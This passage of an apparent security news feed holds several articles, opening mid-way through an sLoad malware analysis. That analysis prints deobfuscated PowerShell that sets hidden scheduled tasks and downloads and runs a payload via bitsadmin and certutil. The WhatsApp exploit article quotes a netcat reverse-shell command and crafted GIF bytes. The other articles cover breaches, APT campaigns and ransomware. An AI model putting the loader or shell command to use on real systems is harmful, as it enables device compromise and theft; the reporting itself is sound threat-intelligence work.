  9. If(test-path $Z5lTNXB”\_in”){$gQd0DB82ByQ0pziwKZ=Get-ChildItem $Z5lTNXB”\_in”;$FQDO2rSjJJxrkrYFWM1W = Get-Date;if ($gQd0DB82ByQ0pziwKZ.LastWriteTime -gt $FQDO2rSjJJxrkrYFWM1W.AddMinutes(-30)){break;break;}}; “1” | out-file $Z5lTNXB”\_in”;
  10. try{ Remove-Item $Z5lTNXB’\*’}catch{}
  11. $wsxDITPgQCH=”76492d1 […] A1AA==”;
  12. $wsxDITPgQCH | out-file $Z5lTNXB’\config.ini’;
  13. $5r8DcJB4ok4=”7649 […] AGIA”;
  14. $5r8DcJB4ok4 | out-file $Z5lTNXB’\web.ini’;
  15. start-process -windowstyle hidden schtasks ‘/change /tn GoFast /disable’;
  16. $2aWxu9dutZfOPCCgS=”Dim winssh […] winssh.run “powershell -ep bypass -file vJjFwtSM.ps1″,0,true”;
  17. $2aWxu9dutZfOPCCgS | out-file $Z5lTNXB’\’$lNlNrKyk’.tmp’
  18. $r1uIiPZBhUea0=” $zTxePJtpmbVI0btT6cd9=Get-Process -name powershell*; […] Invoke-Expression $NLO3lwvn1xWn;}”;
  19. $r1uIiPZBhUea0 | out-file $Z5lTNXB’\’$lNlNrKyk’.ps1′
  20. $nz0oninX6=”1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16″;
  21. $E6M6Np8nhXnu4ndPEJ=”/F /create /sc minute /mo 3 /TN “U52A34D” /ST 07:00 /TR “wscript /E:vbscript C:\Users\admin\AppData\Roaming\52A34D\vJjFwtSM.tmp”;
  22. start-process -windowstyle hidden schtasks $E6M6Np8nhXnu4ndPEJ;

Code snippet 6: Deobfuscated content of “x2401.jpg” file.

Like previous script, this one perform the same operations and create other four file in “%AppData%\Roaming\<active_process>” path. This time the files are:

Figure 7: Files created in “%AppData%\Roaming\<active_process>\”
  • <random_name>.tmp
  • <random_name>.ps1
  • config.ini
  • web.ini

The first executed file is “<random_name>.tmp”. It is not obfuscated and its only purpose is the execution of “<random_name>.ps1”. The content of “<random_name>.ps1” file is the following. The latest script decrypt the content of “config.ini” file. The following figure shown both encrypted and decrypted “config.ini” file.

Figure 8: Files created in “%AppData%\Roaming\<active_process>\”

This script performs the same operation described in “main.ini” file but use different URLs stored in the “web.ini” file. Also this time, the file is decrypted using an integer array from 1 to 16  as key and contained in “$mainKey” variable.

Figure 9: “web.ini” file before and after decryption

Finally, it tries to download the final payload with the following piece of script. However, at the time of analysis, all the C2 URLs seems to be down, so we are not able to detect the final payload family. 

  1. $dPath = [Environment]::GetFolderPath(“MyDocuments”)
  2. $jerry=$starsLord+’\’+$roccon+’_’+$rp;
  3. $clpsr=’/C bitsadmin /transfer ‘+$rp+’ /download /priority FOREGROUND ‘+$line+’ ‘+$jerry+’.txt & Copy /Z ‘+$jerry+’.txt ‘+$jerry+’_1.txt & certutil -decode ‘+$jerry+’_1.txt ‘+$dPath+’\’+$roccon+’_’+$rp+’.exe & powershell -command “start-process ‘+$dPath+’\’+$roccon+’_’+$rp+’.exe” & exit’;
  4. start-process -wiNdowStylE HiddeN $mainDMC $clpsr;
  5. $clpsr=’/C del ‘+$jerry+’.txt & del ‘+$jerry+’_1.txt & del ‘+$dPath+’\’+$roccon+’_’+$rp+’.exe & exit’;
  6. start-process -wiNdowStylE HiddeN $mainDMC $clpsr;

Code snippet 7: script to download the final payload

Comparison With Previous Chains

To better understand the evolution of sLoad infection chain, we compared attack attempts observed since 2018 and the latest ones. In both cases, the infection vector is a carefully themed malicious email, weaponized with zip archive containing two files. In the first case the starting point is a “.lnk” file and in the second one the chain starts with a “.vbs” script. 

The sLoad attack chain observed months ago was characterized by some pieces of powershell code appended to the tail of the zip archive. Probably, this technique become more detectable during the time, so it could have been deprecated in latest infections attempts. For both malware variants, the archive contains a legit image (or pdf) used to deceive the unaware user. Moreover, in the first analyzed variant, the core of the infection is mainly based on powershell scripts and LOLbins. However, the latest stages uses a mix of Powershell and Visual Basic Scripts.


Figure 10: Infection chain workflow

The agent body is still quite similar in the core structure, however the bot now supports new commands such as “Exec” and “Eval”, the latter is able to download further code through the Bitsadmin utility instead of directly rely on “Net.WebClient” primitive. Also, the “ScreenCapture” function have been removed from the new version of the code, in favor to the enhancement of the agent persistence through scheduled task.

Figure 11: Comparison between old and new version on “config.ini” file

Conclusion

sLoad is keeping evolving their TTPs and represents a vivid threat for the Italian cyber-panorama. Also, many times, especially during the last months, its activities in the country involved the abuse of certified mailboxes (PEC) targeting associated professionals and consultants, along with private companies. Additionally, the quality of the latest phishing emails is high: the group adopted templates and naming conventions actually in use by  Italian Revenue Agency (“Agenzia delle Entrate”).

The plentiful usage of LOLbins, Powershell scripts and SSL encrypted channels, makes detection of this threat difficult for automated systems, and frequently requires analysis abilities or high quality threat intelligence sources to detect and tackle sLoad attack campaigns, many times targeting just a single country.

Experts published a post on the Yoroi blog:

https://blog.yoroi.company/research/the-sload-threat-ten-months-later/

Pierluigi Paganini

(SecurityAffairs – sLoad, malware)

The post The sLoad Threat: Ten Months Later appeared first on Security Affairs.

Project Zero researcher found unpatched Android zero-day likely exploited by NSO group

Google Project Zero researcher Maddie Stone discovered a critical unpatched zero-day vulnerability affecting the Android mobile operating system.

Maddie Stone, a member of the Google elite team Project Zero, discovered a critical unpatched zero-day vulnerability affecting the Android mobile operating system. According to the expert, the bug, tracked as CVE-2019-2215, was allegedly being used or sold by the controversial surveillance firm NSO Group.

Maddie Stone published technical details and a proof-of-concept exploit for the high-severity security vulnerability, seven days after she reported it to the colleagues of the Android security team.

The flaw is a use-after-free vulnerability that affects the Android kernel’s binder driver, it could be exploited by a local privileged attacker or a malicious app to escalate privileges to gain root access to a vulnerable device. Experts warn it could potentially allow to fully compromise the device.

“There is a use-after-free of the wait member in the binder_thread struct in the binder driver at /drivers/android/binder.c.” reads the security advisory.

“As described in the upstream commit: “binder_poll() passes the thread->wait waitqueue that can be slept on for work. When a thread that uses
epoll explicitly exits using BINDER_THREAD_EXIT, the waitqueue is freed, but it is never removed from the corresponding epoll data structure. When
the process subsequently exits, the epoll cleanup code tries to access the waitlist, which results in a use-after-free.”

The flaw affects versions of Android kernel released before April last year. This vulnerability was addressed in Dec 2017 in the 4.14 LTS kernel [1], AOSP android 3.18 kernel [2], AOSP android 4.4 kernel [3], and AOSP android 4.9 kernel [4]. The expert pointed out that Pixel 2 with most recent security bulletin is still vulnerable based on source code review.

This means that most of the Android devices available on the market with the unpatched kernel are still vulnerable to this vulnerability, even is the owners have installed the latest Android security updates.

Some of the devices which appear to be vulnerable based on source code review are:

1) Pixel 2 with Android 9 and Android 10 preview (https://android.googlesource.com/kernel/msm/+/refs/heads/android-msm-wahoo-4.4-q-preview-6/)
2) Huawei P20
3) Xiaomi Redmi 5A
4) Xiaomi Redmi Note 5
5) Xiaomi A1
6) A3
7) Moto Z3
8) Oreo LG phones (run according to )
9) Samsung S7, S8, S9

Maddie Stone explained that the flaw is accessible from inside the Chrome sandbox, the issue is exploitable in Chrome’s renderer processes under Android’s ‘isolated_app’ SELinux domain. This means that a remote attacker could potentially exploit the flaw by chaining it with a Chrome rendering issue.

“The bug is a local privilege escalation vulnerability that allows for a full compromise of a vulnerable device. If the exploit is delivered via the web, it only needs to be paired with a renderer exploit, as this vulnerability is accessible through the sandbox.” Stone said.

“I’ve attached a local exploit proof-of-concept to demonstrate how this bug can be used to gain arbitrary kernel read/write when run locally. It only requires untrusted app code execution to exploit CVE-2019-2215.”

Google is expected to release a security patch for its October’s Android Security Bulletin.

“This issue is rated as High severity on Android and by itself requires installation of a malicious application for potential exploitation. Any other vectors, such as via web browser, require chaining with an additional exploit,” concludes the Chromium blog. “We have notified Android partners, and the patch is available on the Android Common Kernel. Pixel 3 and 3a devices are not vulnerable while Pixel 1 and 2 devices will be receiving updates for this issue as part of the October update.”

Pierluigi Paganini

(SecurityAffairs – Google, zero-day)

The post Project Zero researcher found unpatched Android zero-day likely exploited by NSO group appeared first on Security Affairs.

Egypt regularly spies on opponents and activists with mobile apps

Researchers at Check Point discovered that Egypt ‘ government has been spying citizens in a sophisticated surveillance program

Researchers at Check Point discovered that the Egyptian government has been spying on activists and opponents as part of a sophisticated surveillance program.

The list of victims is long and includes journalists, politicians, activists and lawyers.

The expert started their investigation after Amnesty International published a report in March that provided details on targeted attacks against journalists and human rights activists in Egypt.

The Egyptian government conducted most of the spying activities using mobile apps, some of which are also delivered via Google Play.

Check Point has identified tens of victims that were tricked into download the malicious apps that offered useful services.

Some of the apps used by the attackers were Secure Mail, a Gmail add-on to improve the security, iLoud200%, a smart storage solution that would free up storage space on the victim’s device, and the IndexY callerID service.

Using these apps the government cyber spies were able to gather login credentials to email accounts, bypass privacy settings, and store call logs.

These apps were available through the official Play Store and bypassed the security checks implemented by Google.

Experts provided details of the command and control infrastructure over the time. Attackers used a range of domain names that included words like “secure” and “verify” in their names to avoid raising suspicion of the victims.

“The full list of indicators belonging to this campaign and shared by Amnesty on GitHub showed multiple websites that used keywords such as “mail”, “secure”, or “verify”, possibly not to arouse any suspicions and to masquerade as legitimate mailing services.” reads the report published by Check Point.

“By visualizing the information available about each of these websites, we saw clear connections between them: they were registered using NameCheap, had HTTPS certificates, and many of them resolved to the same IP addresses.”

One of the domains analyzed by the researchers, maillogin[.]live, left a directory unsecured online, allowing the expert to analyze its content, a collection of files uploaded between May and June.

Egypt

“By downloading the contents of this directory, we got our hands on many PHP scripts, API clients, SQL files and configuration files from the server. Looking into them revealed several aspects about the inner workings of this operation, the functionalities that were implemented on this server and possibly others, and lastly some information about the perpetrators behind it all.” continues the analysis.

“For example, we realized that the attackers can control the operation by sending commands to one of the PHP scripts. The script allowed the attackers to query the data stored on the server, but it had self-destructing capabilities as well, such as removing an existing campaign or deleting all of the information collected from victims”

The researchers also discovered a Telegram channel that advertised itself as supporting the opponents of the regime in Egypt, but that is likely under the control of the intelligence services.

Check Point was not able to attribute the operation to the Egyptian intelligence, but the nature of the victims, the level of sophistication of the attacks and other evidence such as a server registered to the Ministry of Communications and Information Technology in Egypt.

“We discovered a list of victims that included handpicked political and social activists, high-profile journalists and members of non-profit organizations in Egypt.” concludes Check Point.

“The information we gathered from our investigation suggested that the perpetrators are Arabic speakers, and well familiar with the Egyptian ecosystem. Because the attack might be government-backed, it means that we are looking at what might be a surveillance operation of a country against its own citizens or of another government that screens some other attack using this noisy one.”

Pierluigi Paganini

(SecurityAffairs – Egypt, surveillance)

The post Egypt regularly spies on opponents and activists with mobile apps appeared first on Security Affairs.

6 cyber-espionage campaigns since 2013 attributed to PKPLUG China-linked group

Security experts linked a number of cyber-espionage campaigns observed over the years to the same Chinese threat actor, tracked as PKPLUG.

Security experts linked a number of cyber-espionage campaigns observed over the years to the same Chinese threat actor, tracked as PKPLUG. The name comes from the threat actor using PlugX inside ZIP archives containing the ASCII magic bytes “PK” in the header.

“For three years, Unit 42 has tracked a set of cyber espionage attack campaigns across Asia, which used a mix of publicly available and custom malware. Unit 42 created the moniker “PKPLUG” for the threat actor group, or groups, behind these and other documented attacks referenced later in this report.” reads the report published by Palo Alto Networks. “We say group or groups as our current visibility doesn’t allow us to determine with high confidence if this is the work of one group, or more than one group which uses the same tools and has the same tasking.”

Hackers targeted entities in the Southeast Asia region, most of the victims were in Myanmar, Taiwan, Vietnam, and Indonesia. Experts believe the PKPLUG also targeted other countries in Asia, including Tibet, Xinjiang, and Mongolia. 

The China-linked APT group has been active for at least six years, it used both custom-made and publicly available malware.

Researchers at Palo Alto Networks’ Unit 42 reported that some of the tools used in the campaigns were also involved in attacks carried out by other threat actors.

The experts observed the threat actor mainly delivered the PlugX backdoor, but the attackers also used the HenBox Android malware, the Farseer backdoor for Windows, the 9002 and Zupdax trojans, and Poison Ivy RAT.

Below the timeline of the PKPLUG attacks over the years:

PKPLUG aPt

The first campaign associated with the PKPLUG was observed in November 2013, when the group targeted Mongolian individuals with PlugX RAT. In April 2016, researchers from Arbor Network uncovered a campaign aimed at delivering the Poison Ivy to targets in Myanmar and other countries in Asia. A month later, Unit 42 researchers spotted another campaign that targeted entities from Myanmar, the Uyghur minority, Tibet, Vietnam, Indonesia, and Taiwan with the 9002 Trojan.

In March 2017, the Hong Kong-based cybersecurity company VKRL spotted a campaign targeting entities in Mongolia. One year later, on March 2018, Unit 42 experts spotted a campaign involving a new Android malware family named “HenBox.” Hackers targeted primarily the Uyghurs minority.

Early 2019, Unit 42 researchers discovered a previously-unknown Windows backdoor Trojan called Farseer that was used by the threat actors in attacks against targets in Myanmar. Experts noticed overlaps between the infrastructure and the malware used in different campaigns.

“Overlaps between the different campaigns documented, and the malware families used in them, exist both in infrastructure (domain names and IP addresses being reused, sometimes in multiple cases) and in terms of malicious traits (program runtime behaviors or static code characteristics are also where relationships can be found or strengthened).” continues the analysis.

In at least four of the six campaigns, the threat actors used a shared set of IP addresses as command and control (C2) infrastructure.

Researchers also discovered that attackers used the same registrant for various domain names hosted at those addresses.

“Based on what we know and what we’ve gleaned from others’ publications, and through industry sharing, PKPLUG is a threat group, or groups, operating for at least the last six years using several malware families — some more well-known: Poison Ivy, PlugX, and Zupdax; some are less well-known: 9002, HenBox, and Farseer.” concludes the analysis. “Unit 42 has been tracking the adversary for three years and based on public reporting believes with high confidence that it has origins to Chinese nation-state adversaries.”

Pierluigi Paganini

(SecurityAffairs – PKPLUG, China)

The post 6 cyber-espionage campaigns since 2013 attributed to PKPLUG China-linked group appeared first on Security Affairs.

FBI warns about high-impact Ransomware attacks on U.S. Organizations

The U.S. Federal Bureau of Investigation (FBI) Internet Crime Complaint Center (IC3) warns organizations about high-impact ransomware attacks.

In a wake of the recent string of attacks against cities, school districts and hospitals, the U.S. Federal Bureau of Investigation (FBI) Internet Crime Complaint Center (IC3) issued organizations about high-impact ransomware attacks.

“Ransomware attacks are becoming more targeted, sophisticated, and costly, even as the overall frequency of attacks remains consistent.” reads the public service announcement published by the IC3.

“Since early 2018, the incidence of broad, indiscriminant ransomware campaigns has sharply declined, but the losses from ransomware attacks have increased significantly, according to complaints received by IC3 and FBI case information. Although state and local governments have been particularly visible targets for ransomware attacks, ransomware actors have also targeted health care organizations, industrial companies, and the transportation sector.”

The FBI has observed cyber organizations using multiple techniques to deliver ransomware, including phishing campaigns and the exploitation of Remote Desktop Protocol (RDP) and software vulnerabilities.

The authorities discourage victims from paying a ransom because there is no guarantee that files will be decrypted. Sometimes crooks don’t decrypt them after the payment, in other cases security issues in the encryption process, or in the malware development, make it impossible to decrypt the data.

FBI urges victims to report the incident to the local FBI field office and to ic3.gov to receive the necessary support.

“Regardless of whether you or your organization have decided to pay the ransom, the FBI urges you to report ransomware incidents to law enforcement.” continues the announcement. “Doing so provides investigators with the critical information they need to track ransomware attackers, hold them accountable under U.S. law, and prevent future attacks.”

Reporting the ransomware attacks to the FBI will help law enforcement to track the crooks behind the campaign and to collect the indicators of compromise associated with the threat.

Below the cyber defense best practices shared by the FBI:

• Regularly back up data and verify its integrity
• Focus on awareness and training
• Patch the operating system, software, and firmware on devices
• Enable anti-malware auto-update and perform regular scans
• Implement the least privilege for file, directory, and network share permissions
• Disable macro scripts from Office files transmitted via email
• Implement software restriction policies and controls
• Employ best practices for use of RDP
• Implement application whitelisting
• Implement physical and logical separation of networks and data for different org units
• Require user interaction for end-user apps communicating with uncategorized online assets

Pierluigi Paganini

(SecurityAffairs – FBI, ransomware)

The post FBI warns about high-impact Ransomware attacks on U.S. Organizations appeared first on Security Affairs.

Ukrainian police dismantled a bot farm involved in multiple spam campaigns

The Ukrainian police dismantled a bot farm involved in spam campaigns carried out through various services, including email and social networks.

Cybercrime is a prolific business, criminal organizations continues to make profits with illegal activities in the cyberspace, but police are ready to contrast them. Cyber experts at the Ukrainian police dismantled a bot farm involved in spam campaigns carried out through various services, including email and social networks.

“Cyber ​​police officers, together with investigators of the Main Investigative Directorate of the National Police of Ukraine, under the procedural guidance of the Prosecutor General’s Office of Ukraine, exposed a large-scale service for mass distribution of electronic messages.” states the press release published by the Ukrainian police. “It is established that all works of the service are carried out exclusively at the request of interested clients. With this resource, it was possible to buy activated accounts in large numbers to various mail resources, social networks, payment systems and more. At the same time, verified accounts were also sold, the cost of which was much higher.”

Operators behind the bot farm were offering large numbers of active accounts for multiple online services that their customers used to carry out spam campaigns.

The Ukrainian Police raided houses, apartments, garages and rented offices in six Ukrainian cities (Kiev, Odesa, Lviv, Nikolaev, Rivne, and Kherson) and seized equipment used in the bot farm, including multi-SIM card modems and electronic equipment used to signup to payment systems.

Crooks were using the SIM cars to register accounts on various services that require a phone number for the verification of users’ identity. Crooks were preserving their anonymity using VPN and TOR services.

Police officers and the Main Investigative Directorate of Ukraine’s National Police carried out searches at houses, apartments, garages and rented offices where the group set up the illegal activity.

To anonymize the bot farm traffic, the operators ran connections through VPN services and the Tor network. Details of how the officers were able to discover the physical addresses remain undisclosed.

Authorities will analyze the seized equipment in an attempt to collect additional information on the crime rings.

“The pre-trial investigation is ongoing within the framework of the previously initiated criminal proceedings under Art. 1889 (Requirement), Art. 258 (Terrorist Act), Art. Measures are being taken to prosecute those involved in the organization of such activities. ” concludes the statement.

Today I had the pleasure to write a post on another successful operation conducted by law enforcement. A joint operation conducted by the Netherlands’ National Criminal Investigation Department and National Cyber Security Center allowed to track down and seize five servers that were composing a cybercrime underground bulletproof hosting service.

The servers were hosted at an unnamed data center in Amsterdam, it was used by tens of IoT botnets involved in DDoS attacks worldwide. 

Pierluigi Paganini

(SecurityAffairs – bot farm, cybercrime)

The post Ukrainian police dismantled a bot farm involved in multiple spam campaigns appeared first on Security Affairs.

US Secretary of State Mike Pompeo warns Italy over 5G Chinese equipment supply

US continues to warn its allies over China’s “predatory approach” especially for 5G technology, this time US Secretary of State alerts Italy.

US Secretary of State Mike Pompeo during the recent meeting with Italian Foreign Minister Luigi Di Maio warned Italy of China’s “predatory approach” to trade and investment.

Once again US is warning its allies over Chinese 5G technology, but the Italian Government explained that its special powers over 5G supply deals would mitigate any risk.

According to Pompeo, China and its technology pose a serious threat to the homeland security of the US and its allies.

“China has a predatory approach in trade and investment” and represents a “mutual threat” to the two countries” explained Pompeo during a joint press conference with Italy’s Foreign Minister Luigi Di Maio.

“When the Chinese Communist party shows up to make an investment to gain political power or threaten a nation’s security, that’s what needs to be protected against,”

Di Maio explained that the Italian Government opted to protect its infrastructure invoking the so-called “golden powers” in supply deals for fifth-generation (5G) telecom services. According to Di Maio, the golden powers over the supply deals on technology “make [Italy] among the most advanced in Europe on security”.

“We have no intention of taking part in trade accords that might harm our sovereignty as a state,” he added.

In September, Italy has exercised special powers in relation to the purchase of goods and services. The Italian government will impose conditions and technical specifications for the purchase of equipemnt and services for its 5G infrastructure.

In August, Romania announced it will ban Chinese giant Huawei from its 5G network, reads a joint statement signed by the Romanian and US presidents.

In April, British Government approved a limited role for Huawei in the building of a national 5G network in the country, ignoring security concerns from senior ministers. In December, a Czech cyber-security agency warned against using Huawei and ZTE technologies because they pose a threat to state security.

The Chinese giant was already excluded by several countries from building their 5G internet networks. The United StatesAustraliaNew Zealand, and Japan announced the exclusion of Huawei technology for their 5G internet networks.

Pierluigi Paganini

(SecurityAffairs – China, 5G)

The post US Secretary of State Mike Pompeo warns Italy over 5G Chinese equipment supply appeared first on Security Affairs.

Zendesk 2016 security breach may impact Uber, Slack, and over 100k organizations

Zendesk discloses a data breach that took place in 2016 when a hacker accessed data of 10,000 users, including passwords, emails, names, and phone numbers.

In 2016, customer service software company Zendesk suffered a security breach that exposed data of 10,000 users, including passwords, emails, names, and phone numbers. Zendesk software is currently used by more than one hundred of thousand organizations worldwide, including Uber, Shopify, Airbnb, and Slack.

Today the company published a security notice to disclose the incident.

“We recently were alerted by a third party regarding a security matter that may have affected the Zendesk Support and Chat products and customer accounts of those products activated prior to November of 2016.” reads the security notice. “While our investigation is still ongoing, on September 24, 2019, we determined that information belonging to a small percentage of customers was accessed prior to November of 2016.”

The company was informed by a third party regarding the security breach that might have impacted Zendesk Support and Chat accounts activated prior to November 1, 2016.

As of September 24, 2019 the company identified approximately 10,000 Zendesk Support and Chat accounts, including expired trial and accounts that are no longer active.

The customer service software firm decided to alert all the impacted users inviting them to take the following steps

  • If you installed a Zendesk Marketplace or private app prior to November 1, 2016 that saved authentication credentials such as API keys or passwords during installation, we recommend that you rotate all credentials for the respective app.
  • In addition, if you uploaded a TLS certificate to Zendesk prior to November 1, 2016 which is still valid, we recommend you upload a new certificate, and revoke the old one
  • While we have no indication at this time that other authentication credentials were accessed, customers may want to consider rotating authentication credentials used in Zendesk products prior to November 1, 2016. API Tokens in Chat do not need to be rotated.

The customer support ticketing platform discovered that the following customer information might have been accessed by the attacker:

  • Agent and end-user names that were hashed and salted
  • Contact information
  • Usernames and hashed and salted passwords
  • Transport Layer Security (TLS) encryption keys provided to Zendesk by customers
  • Configuration settings of apps installed from the Zendesk app marketplace or private apps   

The company announced that as a precautionary measure it will implement password rotations for all active agents in Support and Chat, and all end users in Support created prior to November 1, 2016. 

“Our security team is committed to determining the full extent of the data exposure and we will update you if we learn of any additional information that pertains to unauthorized access to your account so you can take appropriate proactive measures to protect your business,” concludes Zendesk.

Anyway, customers are invited to change their passwords.

This isn’t the first security breach suffered by Zendesk, the company was already breached in 2013.

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

The post Zendesk 2016 security breach may impact Uber, Slack, and over 100k organizations appeared first on Security Affairs.

Expert disclosed details of remote code execution flaw in Whatsapp for Android

Researcher discovered a double-free vulnerability in WhatsApp for Android that could be exploited by remote attackers to execute arbitrary code on the vulnerable device.

A security researcher that goes online with the moniker Awakened discovered a double-free vulnerability in WhatsApp for Android and demonstrated how to leverage on it to remotely execute arbitrary code on the target device.

The expert reported the issue to Facebook that acknowledged and addressed the flaw with the release of WhatsApp version 2.19.244.

The expert discovered that the flaw resides in the DDGifSlurp in decoding.c in libpl_droidsonroids_gif .so library used to generate the preview of the GIF file when a user opens Gallery view in the popular messaging application to send a media file,

“When the WhatsApp Gallery is opened, the said GIF file triggers the double-free bug on rasterBits buffer with size sizeof(GifInfo). Interestingly, in WhatsApp Gallery, a GIF file is parsed twice. When the said GIF file is parsed again, another GifInfo object is created.” reads a technical analysis published by the expert. “Because of the double-free behavior in Android, GifInfo info object and info->rasterBits will point to the same address. DDGifSlurp() will then decode the first frame to info->rasterBits buffer, thus overwriting info and its rewindFunction(), which is called right at the end of DDGifSlurp() function.”

The expert was able to craft a GIF file to control the PC register, then he successfully achieved remote code execution by executing the following command:

system("toybox nc 192.168.2.72 4444 | sh");

The expert highlighted that it was not possible to point to system() function in libc.so, instead, it was necessary to first let PC jumps to an intermediate gadget.

we need an information disclosure vulnerability that gives us the base address of libc.so and libhwui.so. That vulnerability is not in the scope of this blogpost.” continues the expert. ” Note that the address of system() and the gadget must be replaced by the actual address found by an information disclosure vulnerability.”

The expert developed the code that was able to generate a corrupted GIF file that could exploit the vulnerability.

notroot@osboxes:~/Desktop/gif$ gcc -o exploit egif_lib.c exploit.c
.....
.....
.....
notroot@osboxes:~/Desktop/gif$ ./exploit
buffer = 0x7ffc586cd8b0 size = 266
47 49 46 38 39 61 18 00 0A 00 F2 00 00 66 CC CC
FF FF FF 00 00 00 33 99 66 99 FF CC 00 00 00 00
00 00 00 00 00 2C 00 00 00 00 08 00 15 00 00 08
9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 84 9C 09 B0
C5 07 00 00 00 74 DE E4 11 F3 06 0F 08 37 63 40
C4 C8 21 C3 45 0C 1B 38 5C C8 70 71 43 06 08 1A
34 68 D0 00 C1 07 C4 1C 34 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 54 12 7C C0 C5 07 00 00 00 EE FF FF 2C 00 00
00 00 1C 0F 00 00 00 00 2C 00 00 00 00 1C 0F 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 2C 00 00 00 00
18 00 0A 00 0F 00 01 00 00 3B

Then he copied the content into a GIF file and send it as Document with WhatsApp to another WhatsApp user. The researcher explained that the crafted GIF file could not be sent as a Media file, because WhatsApp attempts to convert it into an MP4 before to send it. The vulnerability will be triggered when the target user that has received the malicous GIF file will open WhatsApp Gallery to send a media file to his friend.

Below the attack vectors devised by the expert:

  1. Local privilege escaltion (from a user app to WhatsApp): A malicious app is installed on the Android device. The app collects addresses of zygote libraries and generates a malicious GIF file that results in code execution in WhatsApp context. This allows the malware app to steal files in WhatsApp sandbox including message database.
  2. Remote code execution: Pairing with an application that has an remote memory information disclosure vulnerability (e.g. browser), the attacker can collect the addresses of zygote libraries and craft a malicious GIF file to send it to the user via WhatsApp (must be as an attachment, not as an image through Gallery Picker). When the user opens the Gallery view in WhatsApp, the GIF file will trigger a remote shell in WhatsApp context.

The exploit works for WhatsApp version 2.19.230 and prior versions, the company addressed it with the release of the version 2.19.244

The exploit works for Android 8.1 and 9.0, but the expert explained that it does not work for Android 8.0 and below.

“In the older Android versions, double-free could still be triggered. However, because of the calls by the system after the double-free, the app just crashes before reaching to the point that we could control the PC register.” concludes the expert.

Pierluigi Paganini

(SecurityAffairs – WhatsApp, hacking)

The post Expert disclosed details of remote code execution flaw in Whatsapp for Android appeared first on Security Affairs.

Former American Express employee under investigation for customers’ data abuse

Authorities are investigating an American Express employee for unauthorized access to cardholder information and potentially abuse for fraud.

Authorities launched a criminal investigation on an American Express employee that is suspected to accessed to cardholder information and potentially abused for fraud.

Exposed information includes full name, physical and/or billing address, Social Security numbers, birth dates, and the credit card number.

The suspect is no longer working for the financial organization.

On September 30th, 2019, the financial institution began sending out data breach notifications to the impacted, the notice informed them that the former employee potentially used the data for fraudulent activities, including identity theft and financial frauds.

“It was brought to our attention that personal information, related to your American Express Card account listed above, may have been wrongfully accessed by one of our employees in an attempt to conduct fraudulent activity, including potentially opening accounts at other financial institutions.” reads the data breach notification. “In response, we immediately launched an investigation and are fully cooperating with law enforcement agencies to further their investigation.

American Express is offering free credit monitoring services through Experian Identity Works to impacted customers.

The company is also recommending impacted cardholders to monitor their credit report and statements for any fraudulent activity and report any suspicious activity to their bank.

Pierluigi Paganini

(SecurityAffairs – American Express, cybercrime)

The post Former American Express employee under investigation for customers’ data abuse appeared first on Security Affairs.

Ten hospitals in Alabama and Australia have been hit with ransomware attacks

A new wave of ransomware attacks hit US and Australian hospitals and health service providers causing the paralysis of their systems.

Several hospitals and health service providers from the U.S. and Australia were hit by ransomware attacks that forced the administrators to shut part of their IT infrastructure.

“Ten hospitals—three in Alabama and seven in Australia—have been hit with paralyzing ransomware attacks that are affecting their ability to take new patients, it was widely reported on Tuesday.” reported ArsTechnica.

“All three hospitals that make up the DCH Health System in Alabama were closed to new patients on Tuesday as officials there coped with an attack that paralyzed the health network’s computer system.”

According to a joint press release published by the affected hospitals, the DCH Regional Medical Center, Northport Medical Center, and Fayette Medical Center from West Alabama’s Tuscaloosa, Northport, and Fayette, had limited access to their computing systems.

“A criminal is limiting our ability to use our computer systems in exchange for an as-yet unknown payment,” DCH representatives wrote in a release. “Our hospitals have implemented our emergency procedures to ensure safe and efficient operations in the event technology dependent on computers is not available.”

Similar problems impacted at least seven hospitals in Australia. The information technology systems at a number of hospitals and health services in Gippsland and south-west Victoria have been impacted by a cyber security incident.

“A number of servers across the state have been impacted. Investigations are still taking place on the full extent of the impact.” reads the security advisory,

“The cyber incident, which was uncovered on Monday, has blocked access to several systems by the infiltration of ransomware, including financial management. Hospitals have isolated and disconnected a number of systems such as internet to quarantine the infection.”

A couple of weeks ago, the Campbell County Memorial Hospital in Gilette, Wyoming was hit by a ransomware attack on its computer systems that caused service disruptions.

Recently several US cities have suffered ransomware attacks, in August at least 23 Texas local governments were targeted by coordinated attacks.

Some cities in Florida were also victims of hackers, including Key Biscayne, Riviera Beach and Lake City. In June, the Riviera Beach City agreed to pay $600,000 in ransom to decrypt its data after a ransomware-based attack hit its computer system. A few days later, Lake City also agreed to pay nearly $500,000 in ransom after a ransomware attack.

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files. The list of ransomware attacks is long and includes schools in Louisiana and Alabama.

Health organizations weren’t spared either, LabCorp and Hancock Health being only two of the most recently affected.

Pierluigi Paganini

(SecurityAffairs – hospitals, ransomware)


The post Ten hospitals in Alabama and Australia have been hit with ransomware attacks appeared first on Security Affairs.

Experts found 20 Million tax records for Russian citizens exposed online

Experts discovered an unprotected Elasticsearch cluster containing personally identifiable and tax information of Russian citizens exposed online.

Security experts from Comparitech along with security researcher Bob Diachenko discovered 20 million tax records belonging to Russian citizens exposed online in clear text and without protection.

The experts found an unprotected Elasticsearch cluster that was containing personally identifiable information on Russian citizens spanning from 2009 to 2016.

“A database of more than 20 million Russian tax records was found on an unsecured server, accessible to anyone with a web browser.” reads the post published by Comparitech.

Comparitech partnered with security researcher Bob Diachenko to investigate the data exposure, which included sensitive personal and tax information. The database was taken offline after Diachenko notified the owner, who is based in Ukraine.”

Russian citizens

The Elasticsearch database was first indexed by search engines in May 2018, Diachenko discovered it on September 17, 2019, and on September 20, 2019 it was secured.

It is not possible to determine whether anyone else accessed the exposed data before it was discovered by Diachenko. The experts also revealed that the owner based in Ukraine, but did not reveal its identity.

The cluster included multiple databases, two of them contained tax and personally identifiable information about Russian citizens, prevalently from Moscow and the surrounding area.

